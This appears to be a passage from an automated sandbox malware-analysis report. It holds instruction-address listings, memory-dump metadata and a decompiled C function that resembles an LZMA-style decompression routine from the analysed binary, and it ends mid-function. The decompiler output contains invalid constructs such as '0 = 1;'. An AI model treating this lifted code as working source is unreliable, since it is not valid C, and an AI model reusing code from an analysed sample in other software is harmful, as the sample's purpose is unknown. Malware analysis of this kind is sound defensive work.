                                                    0x00000000
                                                    0x00000000
                                                    0x0040711c
                                                    0x0040711c
                                                    0x00407120
                                                    0x00407127
                                                    0x00407127
                                                    0x0040712a
                                                    0x0040712d
                                                    0x00407137
                                                    0x00000000
                                                    0x00407137
                                                    0x00407122
                                                    0x00407122
                                                    0x00000000
                                                    0x00000000
                                                    0x00407143
                                                    0x00407143
                                                    0x00407147
                                                    0x0040714e
                                                    0x00407151
                                                    0x00407154
                                                    0x00407149
                                                    0x00407149
                                                    0x00407149
                                                    0x00407157
                                                    0x0040715a
                                                    0x0040715d
                                                    0x0040715d
                                                    0x00407160
                                                    0x00407163
                                                    0x00407166
                                                    0x00407166
                                                    0x00407169
                                                    0x00407170
                                                    0x00407175
                                                    0x00000000
                                                    0x00000000
                                                    0x00407203
                                                    0x00407203
                                                    0x00407207
                                                    0x004075a5
                                                    0x004075a5
                                                    0x00000000
                                                    0x004075a5
                                                    0x0040720d
                                                    0x0040720d
                                                    0x00407210
                                                    0x00407213
                                                    0x00407217
                                                    0x0040721a
                                                    0x00407220
                                                    0x00407222
                                                    0x00407222
                                                    0x00407222
                                                    0x00407225
                                                    0x00407228
                                                    0x00000000
                                                    0x00000000
                                                    0x00406df8
                                                    0x00406df8
                                                    0x00406dfc
                                                    0x00407569
                                                    0x00407569
                                                    0x00000000
                                                    0x00407569
                                                    0x00406e02
                                                    0x00406e02
                                                    0x00406e05
                                                    0x00406e08
                                                    0x00406e0c
                                                    0x00406e0f
                                                    0x00406e15
                                                    0x00406e17
                                                    0x00406e17
                                                    0x00406e17
                                                    0x00406e1a
                                                    0x00406e1d
                                                    0x00406e1d
                                                    0x00406e20
                                                    0x00406e23
                                                    0x00000000
                                                    0x00000000
                                                    0x00406e29
                                                    0x00406e29
                                                    0x00406e2f
                                                    0x00000000
                                                    0x00000000
                                                    0x00406e35
                                                    0x00406e35
                                                    0x00406e39
                                                    0x00406e3c
                                                    0x00406e3f
                                                    0x00406e42
                                                    0x00406e45
                                                    0x00406e46
                                                    0x00406e49
                                                    0x00406e4b
                                                    0x00406e51
                                                    0x00406e54
                                                    0x00406e57
                                                    0x00406e5a
                                                    0x00406e5d
                                                    0x00406e60
                                                    0x00406e63
                                                    0x00406e7f
                                                    0x00406e82
                                                    0x00406e85
                                                    0x00406e88
                                                    0x00406e8f
                                                    0x00406e93
                                                    0x00406e95
                                                    0x00406e99
                                                    0x00406e65
                                                    0x00406e65
                                                    0x00406e69
                                                    0x00406e71
                                                    0x00406e76
                                                    0x00406e78
                                                    0x00406e7a
                                                    0x00406e7a
                                                    0x00406e9c
                                                    0x00406ea3
                                                    0x00406ea6
                                                    0x00000000
                                                    0x00406eac
                                                    0x00406eac
                                                    0x00000000
                                                    0x00406eac
                                                    0x00000000
                                                    0x00406eb1
                                                    0x00406eb1
                                                    0x00406eb5
                                                    0x00407575
                                                    0x00407575
                                                    0x00000000
                                                    0x00407575
                                                    0x00406ebb
                                                    0x00406ebb
                                                    0x00406ebe
                                                    0x00406ec1
                                                    0x00406ec5
                                                    0x00406ec8
                                                    0x00406ece
                                                    0x00406ed0
                                                    0x00406ed0
                                                    0x00406ed0
                                                    0x00406ed3
                                                    0x00406ed6
                                                    0x00406ed6
                                                    0x00406ed6
                                                    0x00406edc
                                                    0x00000000
                                                    0x00000000
                                                    0x00406ede
                                                    0x00406ede
                                                    0x00406ee1
                                                    0x00406ee4
                                                    0x00406ee7
                                                    0x00406eea
                                                    0x00406eed
                                                    0x00406ef0
                                                    0x00406ef3
                                                    0x00406ef6
                                                    0x00406ef9
                                                    0x00406efc
                                                    0x00406f14
                                                    0x00406f17
                                                    0x00406f1a
                                                    0x00406f1d
                                                    0x00406f1d
                                                    0x00406f20
                                                    0x00406f24
                                                    0x00406f26
                                                    0x00406efe
                                                    0x00406efe
                                                    0x00406f06
                                                    0x00406f0b
                                                    0x00406f0d
                                                    0x00406f0f
                                                    0x00406f0f
                                                    0x00406f29
                                                    0x00406f30
                                                    0x00406f33
                                                    0x00000000
                                                    0x00406f35
                                                    0x00406f35
                                                    0x00000000
                                                    0x00406f35
                                                    0x00406f33
                                                    0x00406f3a
                                                    0x00406f3a
                                                    0x00406f3a
                                                    0x00406f3a
                                                    0x00000000
                                                    0x00000000
                                                    0x00406f75
                                                    0x00406f75
                                                    0x00406f79
                                                    0x00407581
                                                    0x00407581
                                                    0x00000000
                                                    0x00407581
                                                    0x00406f7f
                                                    0x00406f7f
                                                    0x00406f82
                                                    0x00406f85
                                                    0x00406f89
                                                    0x00406f8c
                                                    0x00406f92
                                                    0x00406f94
                                                    0x00406f94
                                                    0x00406f94
                                                    0x00406f97
                                                    0x00406f9a
                                                    0x00406f9a
                                                    0x00406fa0
                                                    0x00406f3e
                                                    0x00406f3e
                                                    0x00406f41
                                                    0x00000000
                                                    0x00406f41
                                                    0x00406fa2
                                                    0x00406fa2
                                                    0x00406fa5
                                                    0x00406fa8
                                                    0x00406fab
                                                    0x00406fae
                                                    0x00406fb1
                                                    0x00406fb4
                                                    0x00406fb7
                                                    0x00406fba
                                                    0x00406fbd
                                                    0x00406fc0
                                                    0x00406fd8
                                                    0x00406fdb
                                                    0x00406fde
                                                    0x00406fe1
                                                    0x00406fe1
                                                    0x00406fe4
                                                    0x00406fe8
                                                    0x00406fea
                                                    0x00406fc2
                                                    0x00406fc2
                                                    0x00406fca
                                                    0x00406fcf
                                                    0x00406fd1
                                                    0x00406fd3
                                                    0x00406fd3
                                                    0x00406fed
                                                    0x00406ff4
                                                    0x00406ff7
                                                    0x00000000
                                                    0x00406ff9
                                                    0x00406ff9
                                                    0x00000000
                                                    0x00406ff9
                                                    0x00000000
                                                    0x00407286
                                                    0x00407286
                                                    0x0040728a
                                                    0x004075b1
                                                    0x004075b1
                                                    0x00000000
                                                    0x004075b1
                                                    0x00407290
                                                    0x00407290
                                                    0x00407293
                                                    0x00407296
                                                    0x0040729a
                                                    0x0040729d
                                                    0x004072a3
                                                    0x004072a5
                                                    0x004072a5
                                                    0x004072a5
                                                    0x004072a8
                                                    0x00000000
                                                    0x00000000
                                                    0x00407056
                                                    0x00407056
                                                    0x00407059
                                                    0x00000000
                                                    0x00000000
                                                    0x00407395
                                                    0x00407395
                                                    0x00407399
                                                    0x004073bb
                                                    0x004073bb
                                                    0x004073be
                                                    0x004073c8
                                                    0x004073cb
                                                    0x004073cb
                                                    0x00000000
                                                    0x004073cb
                                                    0x0040739b
                                                    0x0040739b
                                                    0x0040739e
                                                    0x004073a2
                                                    0x004073a5
                                                    0x004073a5
                                                    0x004073a8
                                                    0x00000000
                                                    0x00000000
                                                    0x00407452
                                                    0x00407452
                                                    0x00407456
                                                    0x00407474
                                                    0x00407474
                                                    0x00407474
                                                    0x00407474
                                                    0x0040747b
                                                    0x00407482
                                                    0x00407489
                                                    0x00407489
                                                    0x00407490
                                                    0x00407493
                                                    0x0040749a
                                                    0x00000000
                                                    0x0040749d
                                                    0x00407458
                                                    0x00407458
                                                    0x0040745b
                                                    0x0040745e
                                                    0x00407461
                                                    0x00407468
                                                    0x004073ac
                                                    0x004073ac
                                                    0x004073af
                                                    0x00000000
                                                    0x00000000
                                                    0x00407543
                                                    0x00407543
                                                    0x00407546
                                                    0x00407447
                                                    0x00407447
                                                    0x00407447
                                                    0x00000000
                                                    0x0040744d
                                                    0x00000000
                                                    0x0040717d
                                                    0x0040717d
                                                    0x0040717f
                                                    0x00407186
                                                    0x00407187
                                                    0x00407189
                                                    0x0040718c
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00407490
                                                    0x00407490
                                                    0x00407493
                                                    0x0040749a
                                                    0x00000000
                                                    0x0040749d
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x004071c2
                                                    0x004071c2
                                                    0x004071c5
                                                    0x004071fb
                                                    0x004071fb
                                                    0x0040732b
                                                    0x0040732b
                                                    0x0040732b
                                                    0x0040732b
                                                    0x0040732e
                                                    0x0040732e
                                                    0x00407331
                                                    0x00407333
                                                    0x004075bd
                                                    0x004075bd
                                                    0x00000000
                                                    0x004075bd
                                                    0x00407339
                                                    0x00407339
                                                    0x0040733c
                                                    0x00000000
                                                    0x00000000
                                                    0x00407342
                                                    0x00407342
                                                    0x00407346
                                                    0x00407349
                                                    0x00407349
                                                    0x00407349
                                                    0x00000000
                                                    0x00407349
                                                    0x004071c7
                                                    0x004071c7
                                                    0x004071c9
                                                    0x004071cb
                                                    0x004071cd
                                                    0x004071d0
                                                    0x004071d1
                                                    0x004071d3
                                                    0x004071d5
                                                    0x004071d8
                                                    0x004071db
                                                    0x004071f1
                                                    0x004071f1
                                                    0x004071f6
                                                    0x0040722e
                                                    0x0040722e
                                                    0x00407232
                                                    0x0040725b
                                                    0x0040725e
                                                    0x00407260
                                                    0x00407267
                                                    0x0040726a
                                                    0x0040726d
                                                    0x0040726d
                                                    0x00407272
                                                    0x00407272
                                                    0x00407274
                                                    0x00407277
                                                    0x0040727e
                                                    0x00407281
                                                    0x004072ae
                                                    0x004072ae
                                                    0x004072b1
                                                    0x004072b4
                                                    0x00407328
                                                    0x00407328
                                                    0x00407328
                                                    0x00407328
                                                    0x00000000
                                                    0x00407328
                                                    0x004072b6
                                                    0x004072b6
                                                    0x004072bc
                                                    0x004072bf
                                                    0x004072c2
                                                    0x004072c5
                                                    0x004072c8
                                                    0x004072cb
                                                    0x004072ce
                                                    0x004072d1
                                                    0x004072d4
                                                    0x004072d7
                                                    0x004072f0
                                                    0x004072f2
                                                    0x004072f5
                                                    0x004072f6
                                                    0x004072f9
                                                    0x004072fb
                                                    0x004072fe
                                                    0x00407300
                                                    0x00407302
                                                    0x00407305
                                                    0x00407307
                                                    0x0040730a
                                                    0x0040730e
                                                    0x00407310
                                                    0x00407310
                                                    0x00407311
                                                    0x00407314
                                                    0x00407317
                                                    0x004072d9
                                                    0x004072d9
                                                    0x004072e1
                                                    0x004072e6
                                                    0x004072e8
                                                    0x004072eb
                                                    0x004072eb
                                                    0x0040731a
                                                    0x00407321
                                                    0x004072ab
                                                    0x004072ab
                                                    0x004072ab
                                                    0x004072ab
                                                    0x00000000
                                                    0x00407323
                                                    0x00407323
                                                    0x00000000
                                                    0x00407323
                                                    0x00407321
                                                    0x00407234
                                                    0x00407234
                                                    0x00407237
                                                    0x00407239
                                                    0x0040723c
                                                    0x0040723f
                                                    0x00407242
                                                    0x00407244
                                                    0x00407247
                                                    0x0040724a
                                                    0x0040724a
                                                    0x0040724d
                                                    0x0040724d
                                                    0x00407250
                                                    0x00407257
                                                    0x0040722b
                                                    0x0040722b
                                                    0x0040722b
                                                    0x0040722b
                                                    0x00000000
                                                    0x00407259
                                                    0x00407259
                                                    0x00000000
                                                    0x00407259
                                                    0x00407257
                                                    0x004071dd
                                                    0x004071dd
                                                    0x004071e0
                                                    0x004071e2
                                                    0x004071e5
                                                    0x00000000
                                                    0x00000000
                                                    0x00406f44
                                                    0x00406f44
                                                    0x00406f48
                                                    0x0040758d
                                                    0x0040758d
                                                    0x00000000
                                                    0x0040758d
                                                    0x00406f4e
                                                    0x00406f4e
                                                    0x00406f51
                                                    0x00406f54
                                                    0x00406f57
                                                    0x00406f5a
                                                    0x00406f5d
                                                    0x00406f60
                                                    0x00406f62
                                                    0x00406f65
                                                    0x00406f68
                                                    0x00406f6b
                                                    0x00406f6d
                                                    0x00406f6d
                                                    0x00406f6d
                                                    0x00000000
                                                    0x00000000
                                                    0x004070cf
                                                    0x004070cf
                                                    0x004070d3
                                                    0x00407599
                                                    0x00407599
                                                    0x00000000
                                                    0x00407599
                                                    0x004070d9
                                                    0x004070d9
                                                    0x004070dc
                                                    0x004070df
                                                    0x004070e2
                                                    0x004070e4
                                                    0x004070e4
                                                    0x004070e4
                                                    0x004070e7
                                                    0x004070ea
                                                    0x004070ed
                                                    0x004070f0
                                                    0x004070f3
                                                    0x004070f6
                                                    0x004070f7
                                                    0x004070f9
                                                    0x004070f9
                                                    0x004070f9
                                                    0x004070fc
                                                    0x004070ff
                                                    0x00407102
                                                    0x00407105
                                                    0x00407105
                                                    0x00407105
                                                    0x00407108
                                                    0x0040710a
                                                    0x0040710a
                                                    0x00000000
                                                    0x00000000
                                                    0x0040734c
                                                    0x0040734c
                                                    0x0040734c
                                                    0x00407350
                                                    0x00000000
                                                    0x00000000
                                                    0x00407356
                                                    0x00407356
                                                    0x00407359
                                                    0x0040735c
                                                    0x0040735f
                                                    0x00407361
                                                    0x00407361
                                                    0x00407361
                                                    0x00407364
                                                    0x00407367
                                                    0x0040736a
                                                    0x0040736d
                                                    0x00407370
                                                    0x00407373
                                                    0x00407374
                                                    0x00407376
                                                    0x00407376
                                                    0x00407376
                                                    0x00407379
                                                    0x0040737c
                                                    0x0040737f
                                                    0x00407382
                                                    0x00407385
                                                    0x00407389
                                                    0x0040738b
                                                    0x0040738e
                                                    0x00000000
                                                    0x00407390
                                                    0x00407390
                                                    0x0040710d
                                                    0x0040710d
                                                    0x00000000
                                                    0x0040710d
                                                    0x0040738e
                                                    0x004075c3
                                                    0x004075c3
                                                    0x00000000
                                                    0x00000000
                                                    0x00406bf2
                                                    0x004075fa
                                                    0x004075fa
                                                    0x00000000
                                                    0x004075fa
                                                    0x00407447
                                                    0x004074c7
                                                    0x00407490

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.306521689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.306515084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306533062.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306575632.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                                    • Instruction ID: 10cc2cc0f2c892254e5285b7a8bac4c216a70fda8fb68dfa7c3680dd08f727d3
                                                    • Opcode Fuzzy Hash: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                                    • Instruction Fuzzy Hash: 55A15571E04228DBDF28CFA8C8547ADBBB1FF44305F10842AD856BB281D778A986DF45
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00407395 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 98%
                                                    			E00407395() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
